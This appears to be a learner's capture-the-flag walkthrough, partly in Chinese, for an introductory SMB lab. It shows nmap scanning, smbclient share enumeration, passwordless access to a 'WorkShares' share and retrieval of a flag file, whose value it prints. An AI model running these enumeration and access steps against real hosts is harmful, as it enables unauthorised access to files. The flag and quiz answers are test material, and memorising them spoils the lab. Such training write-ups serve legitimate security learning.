Task 1

Q：What does the 3-letter acronym SMB stand for?
​
A：Server Message Block
​

Task 2

Q：What port does SMB use to operate at?
​
A：445
​

Task 3

Q：What network communication model does SMB use, architecturally speaking?
​
A：Client-Server Model
​

Task 4

Q：What is the service name for port 445 that came up in our nmap scan?
​
问用nmap扫描445端口后识别出的服务名称
​

┌──(root💀kali)-[~]
└─# nmap -sV 10.129.53.193 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-28 19:39 CST
Nmap scan report for 10.129.53.193
Host is up (2.9s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.62 seconds

​
A：microsoft-ds
​

Task 5

Q：What is the tool we use to connect to SMB shares from our Linux distribution?
​
A：smbclient
​

Task 6

Q：What is the flagor switchwe can use with the SMB tool to listthe contents of the share?
​
A：-L

​

┌──(root💀kali)-[~]
└─# smbclient -L 10.129.53.193
Enter WORKGROUP\root's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        WorkShares      Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.53.193 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Task 7

Q：What is the name of the share we are able to access in the end?
​
通过上面可以看到Sharename里有4个用户，其中带有$的都是管理员权限，所以我们只能连接WorkShares

​
A：WorkShares
​

Task 8

Q：What is the command we can use within the SMB shell to download the files we find?
​
A：get
​

Task 9

Q：Submit root flag
​
这个我他妈直接GG，
​

┌──(root💀kali)-[/etc]
└─# smbclient \\\\10.219.53.193\\WorkShares
do_connect: Connection to 10.219.53.193 failed (Error NT_STATUS_IO_TIMEOUT)

​
超时了
​
我手动重连了openVPN，就能连上了
​
发现我虚拟机挂起后重新启动后机器就ping不通了，需要手动重启一下openVPN。
​
小细节Get！
​

┌──(root💀kali)-[~/桌面]
└─# smbclient \\\\10.129.227.16\\WorkShares                            130 ⨯
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
.                                   D        0  Mon Mar 29 16:22:01 2021
..                                  D        0  Mon Mar 29 16:22:01 2021
Amy.J                               D        0  Mon Mar 29 17:08:24 2021
James.P                             D        0  Thu Jun  3 16:38:03 2021

5114111 blocks of size 4096. 1732182 blocks available
smb: \> cd James.P\
smb: \James.P\> ls
.                                   D        0  Thu Jun  3 16:38:03 2021
..                                  D        0  Thu Jun  3 16:38:03 2021
flag.txt                            A       32  Mon Mar 29 17:26:57 2021

5114111 blocks of size 4096. 1732182 blocks available
smb: \James.P\> get flag.txt 
getting file \James.P\flag.txt of size 32 as flag.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)

flag

┌──(root💀kali)-[~/桌面]
└─# cat flag.txt                                                       130 ⨯
5f61c10dffbc77a704d76016a22f1664